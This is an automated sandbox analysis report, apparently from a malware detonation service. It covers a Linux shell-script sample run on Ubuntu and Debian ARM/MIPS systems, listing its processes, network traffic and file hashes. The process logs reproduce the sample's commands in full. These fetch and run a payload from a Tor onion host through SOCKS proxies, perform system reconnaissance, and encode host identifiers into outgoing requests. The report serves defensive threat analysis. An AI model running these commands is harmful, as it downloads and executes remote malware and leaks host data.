Malware Analysis Report

2025-05-06 04:16

Sample ID 241024-wpnxwazhjd
Target 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
SHA256 d5b4d0376c9b07f5be237d0e47aa9aa321489917d30559328e544c5d0347e5ea
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

d5b4d0376c9b07f5be237d0e47aa9aa321489917d30559328e544c5d0347e5ea

Threat Level: Shows suspicious behavior

The file 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118 was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Looks up external IP address via web service

Deobfuscate/Decode Files or Information

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-24 18:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-24 18:05

Reported

2024-10-24 18:09

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

132s

Command Line

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/i /tmp/i N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/base64 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/id N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/i /bin/bash N/A

Processes

/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

/bin/bash

[bash]

/usr/bin/base64

[base64 -d]

/usr/bin/cut

[cut -d: -f6]

/usr/bin/id

[id -u]

/bin/grep

[grep x:0: /etc/passwd]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/chmod

[chmod +x ./i]

/tmp/i

[./i]

/bin/rm

[rm -f i]

/usr/bin/tr

[tr \n]

/usr/bin/sort

[sort -uR]

/usr/bin/head

[head -n 1]

/bin/grep

[grep -Ev [.]0]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in]

/bin/uname

[uname -m]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/md5sum

[md5sum]

/bin/date

[date]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 doh-fi.blahdns.com udp
US 1.1.1.1:53 checkip.amazonaws.com udp
US 151.101.193.91:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.6:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp

Files

/tmp/i

MD5 f4b524261fce06c1fbd10b4681ad0b97
SHA1 c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d
SHA256 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031
SHA512 ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-24 18:05

Reported

2024-10-24 18:09

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

15s

Command Line

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/i /tmp/i N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/base64 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/filesystems /usr/bin/id N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/i /bin/bash N/A

Processes

/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

/usr/bin/base64

[base64 -d]

/bin/bash

[bash]

/usr/bin/cut

[cut -d: -f6]

/usr/bin/id

[id -u]

/bin/grep

[grep x:0: /etc/passwd]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/chmod

[chmod +x ./i]

/tmp/i

[./i]

/bin/rm

[rm -f i]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://dns.digitale-gesellschaft.ch/dns-query?name=relay.tor2socks.in]

/usr/bin/sort

[sort -uR]

/bin/grep

[grep -Ev [.]0]

/usr/bin/head

[head -n 1]

/bin/uname

[uname -m]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

Network

Country Destination Domain Proto
US 1.1.1.1:53 dns.digitale-gesellschaft.ch udp
CH 185.95.218.42:443 dns.digitale-gesellschaft.ch tcp
US 1.1.1.1:53 checkip.amazonaws.com udp

Files

/tmp/i

MD5 f4b524261fce06c1fbd10b4681ad0b97
SHA1 c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d
SHA256 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031
SHA512 ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-24 18:05

Reported

2024-10-24 18:13

Platform

debian9-mipsbe-20240611-en

Max time kernel

87s

Max time network

155s

Command Line

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/i /tmp/i N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/base64 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /usr/bin/id N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /sbin/ip N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /sbin/ip N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/i /bin/bash N/A

Processes

/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

/bin/bash

[bash]

/usr/bin/base64

[base64 -d]

/usr/bin/cut

[cut -d: -f6]

/usr/bin/id

[id -u]

/bin/grep

[grep x:0: /etc/passwd]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/chmod

[chmod +x ./i]

/tmp/i

[./i]

/bin/rm

[rm -f i]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/usr/bin/sort

[sort -uR]

/bin/grep

[grep -Ev [.]0]

/usr/bin/head

[head -n 1]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in]

/bin/uname

[uname -m]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

/usr/bin/whoami

[whoami]

/bin/uname

[uname -m]

/bin/uname

[uname -n]

/sbin/ip

[ip a]

/bin/grep

[grep inet ]

/usr/bin/md5sum

[md5sum]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print $2}]

/usr/bin/base64

[base64 -w0]

/usr/bin/crontab

[crontab -l]

/usr/bin/curl

[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_]

/usr/bin/curl

[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./e8eb0a2cdf54c3ac6d6c2fd3f5796222 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_680fff434a0b9c16e89d622a5bd1b890_]

/bin/chmod

[chmod +x ./e8eb0a2cdf54c3ac6d6c2fd3f5796222]

/tmp/e8eb0a2cdf54c3ac6d6c2fd3f5796222

[./e8eb0a2cdf54c3ac6d6c2fd3f5796222]

/bin/rm

[rm -f ./e8eb0a2cdf54c3ac6d6c2fd3f5796222]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/usr/bin/sort

[sort -uR]

/usr/bin/head

[head -n 1]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://dns.twnic.tw/dns-query?name=relay.tor2socks.in]

/bin/grep

[grep -Ev [.]0]

/bin/uname

[uname -m]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

/usr/bin/whoami

[whoami]

/bin/uname

[uname -m]

/bin/uname

[uname -n]

/sbin/ip

[ip a]

/bin/grep

[grep inet ]

/usr/bin/md5sum

[md5sum]

/usr/bin/awk

[awk {print $2}]

/usr/bin/awk

[awk {print $1}]

/usr/bin/crontab

[crontab -l]

/usr/bin/base64

[base64 -w0]

/usr/bin/curl

[curl -4fsSLkA- -m200 -x socks5h://65.108.216.128:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./4db8a69be99c4cf3f0388ff8c87b69b0 -e138.199.29.44_root_mips_debian9-mipsbe-20240611-en-3_d41d8cd98f00b204e9800998ecf8427e_]

Network

Country Destination Domain Proto
US 1.1.1.1:53 doh.no.ahadns.net udp
US 1.1.1.1:53 doh.no.ahadns.net udp
US 1.1.1.1:53 checkip.amazonaws.com udp
IE 34.254.128.37:80 checkip.amazonaws.com tcp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in udp
US 1.1.1.1:53 dns.twnic.tw udp
TW 101.101.101.101:443 dns.twnic.tw tcp
US 1.1.1.1:53 checkip.amazonaws.com udp
IE 34.254.128.37:80 checkip.amazonaws.com tcp
FI 65.108.216.128:9050 tcp

Files

/tmp/i

MD5 f4b524261fce06c1fbd10b4681ad0b97
SHA1 c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d
SHA256 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031
SHA512 ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-24 18:05

Reported

2024-10-24 18:13

Platform

debian9-mipsel-20240226-en

Max time kernel

124s

Max time network

138s

Command Line

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/i /tmp/i N/A
N/A /tmp/i /tmp/i N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/base64 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/filesystems /usr/bin/id N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /sbin/ip N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /sbin/ip N/A
N/A N/A /sbin/ip N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /sbin/ip N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/i /bin/bash N/A

Processes

/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118

[/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118]

/bin/bash

[bash]

/usr/bin/base64

[base64 -d]

/usr/bin/cut

[cut -d: -f6]

/usr/bin/id

[id -u]

/bin/grep

[grep x:0: /etc/passwd]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/chmod

[chmod +x ./i]

/tmp/i

[./i]

/bin/rm

[rm -f i]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/usr/bin/sort

[sort -uR]

/usr/bin/head

[head -n 1]

/bin/grep

[grep -Ev [.]0]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in]

/bin/uname

[uname -m]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

/usr/bin/whoami

[whoami]

/bin/uname

[uname -m]

/bin/uname

[uname -n]

/bin/grep

[grep inet ]

/usr/bin/md5sum

[md5sum]

/usr/bin/awk

[awk {print $1}]

/sbin/ip

[ip a]

/usr/bin/awk

[awk {print $2}]

/usr/bin/crontab

[crontab -l]

/usr/bin/base64

[base64 -w0]

/usr/bin/curl

[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./3d4e2c62a0f0444c5e39a768425ab056 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]

/usr/bin/curl

[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./3d4e2c62a0f0444c5e39a768425ab056 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]

/bin/chmod

[chmod +x ./3d4e2c62a0f0444c5e39a768425ab056]

/tmp/3d4e2c62a0f0444c5e39a768425ab056

[./3d4e2c62a0f0444c5e39a768425ab056]

/bin/rm

[rm -f ./3d4e2c62a0f0444c5e39a768425ab056]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/usr/bin/sort

[sort -uR]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in]

/usr/bin/head

[head -n 1]

/bin/grep

[grep -Ev [.]0]

/bin/uname

[uname -m]

/usr/bin/cut

[cut -f1 -d-]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

/usr/bin/whoami

[whoami]

/bin/uname

[uname -m]

/bin/uname

[uname -n]

/sbin/ip

[ip a]

/bin/grep

[grep inet ]

/usr/bin/md5sum

[md5sum]

/usr/bin/awk

[awk {print $2}]

/usr/bin/awk

[awk {print $1}]

/usr/bin/base64

[base64 -w0]

/usr/bin/crontab

[crontab -l]

/usr/bin/curl

[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./b18c7b90793d1614c38108eb109f833e -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]

/usr/bin/curl

[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./b18c7b90793d1614c38108eb109f833e -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]

/bin/chmod

[chmod +x ./b18c7b90793d1614c38108eb109f833e]

/tmp/b18c7b90793d1614c38108eb109f833e

[./b18c7b90793d1614c38108eb109f833e]

/bin/rm

[rm -f ./b18c7b90793d1614c38108eb109f833e]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/bin/grep

[grep -Ev [.]0]

/usr/bin/sort

[sort -uR]

/usr/bin/head

[head -n 1]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://uncensored.lux1.dns.nixnet.xyz/dns-query?name=relay.tor2socks.in]

/bin/uname

[uname -m]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

/usr/bin/whoami

[whoami]

/bin/uname

[uname -m]

/bin/uname

[uname -n]

/sbin/ip

[ip a]

/bin/grep

[grep inet ]

/usr/bin/awk

[awk {print $2}]

/usr/bin/md5sum

[md5sum]

/usr/bin/awk

[awk {print $1}]

/usr/bin/crontab

[crontab -l]

/usr/bin/base64

[base64 -w0]

/usr/bin/curl

[curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./5f3b49ef027eb052018f97a43d59ca89 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]

/usr/bin/curl

[curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./5f3b49ef027eb052018f97a43d59ca89 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]

/bin/chmod

[chmod +x ./5f3b49ef027eb052018f97a43d59ca89]

/dev/shm/5f3b49ef027eb052018f97a43d59ca89

[./5f3b49ef027eb052018f97a43d59ca89]

/bin/rm

[rm -f ./5f3b49ef027eb052018f97a43d59ca89]

/usr/bin/head

[head -n 1 /tmp/.X11-unix/01]

/bin/ls

[ls /proc//status]

/bin/chmod

[chmod +x ./i]

/tmp/i

[./i]

/bin/rm

[rm -f i]

/bin/grep

[grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b]

/usr/bin/tr

[tr \n]

/usr/bin/curl

[curl -4fsSLkA- -m200 https://dns.twnic.tw/dns-query?name=relay.tor2socks.in]

/usr/bin/head

[head -n 1]

/usr/bin/sort

[sort -uR]

/bin/grep

[grep -Ev [.]0]

/bin/uname

[uname -m]

/bin/date

[date]

/usr/bin/md5sum

[md5sum]

/usr/bin/cut

[cut -f1 -d-]

/usr/bin/curl

[curl -4fsSLk checkip.amazonaws.com]

/usr/bin/whoami

[whoami]

/bin/uname

[uname -m]

/bin/uname

[uname -n]

/sbin/ip

[ip a]

/bin/grep

[grep inet ]

/usr/bin/md5sum

[md5sum]

/usr/bin/awk

[awk {print $2}]

/usr/bin/awk

[awk {print $1}]

/usr/bin/crontab

[crontab -l]

/usr/bin/base64

[base64 -w0]

/usr/bin/curl

[curl -4fsSLkA- -m200 -x socks5h://5.10.228.248:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./1b8f4bb809b6d9f7810d0d4d1656553c -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_]

Network

Country Destination Domain Proto
US 1.1.1.1:53 doh-fi.blahdns.com udp
US 1.1.1.1:53 doh-fi.blahdns.com udp
US 1.1.1.1:53 checkip.amazonaws.com udp
IE 54.78.143.177:80 checkip.amazonaws.com tcp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in udp
US 1.1.1.1:53 doh.no.ahadns.net udp
US 1.1.1.1:53 doh.no.ahadns.net udp
US 1.1.1.1:53 checkip.amazonaws.com udp
IE 52.212.103.61:80 checkip.amazonaws.com tcp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in udp
US 1.1.1.1:53 uncensored.lux1.dns.nixnet.xyz udp
LU 104.244.78.231:443 uncensored.lux1.dns.nixnet.xyz tcp
US 1.1.1.1:53 checkip.amazonaws.com udp
IE 54.78.143.177:80 checkip.amazonaws.com tcp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion udp
US 1.1.1.1:53 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in udp
US 1.1.1.1:53 dns.twnic.tw udp
TW 101.101.101.101:443 dns.twnic.tw tcp
US 1.1.1.1:53 checkip.amazonaws.com udp
IE 54.78.143.177:80 checkip.amazonaws.com tcp
IQ 5.10.228.248:9050 tcp

Files

/tmp/i

MD5 f4b524261fce06c1fbd10b4681ad0b97
SHA1 c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d
SHA256 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031
SHA512 ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449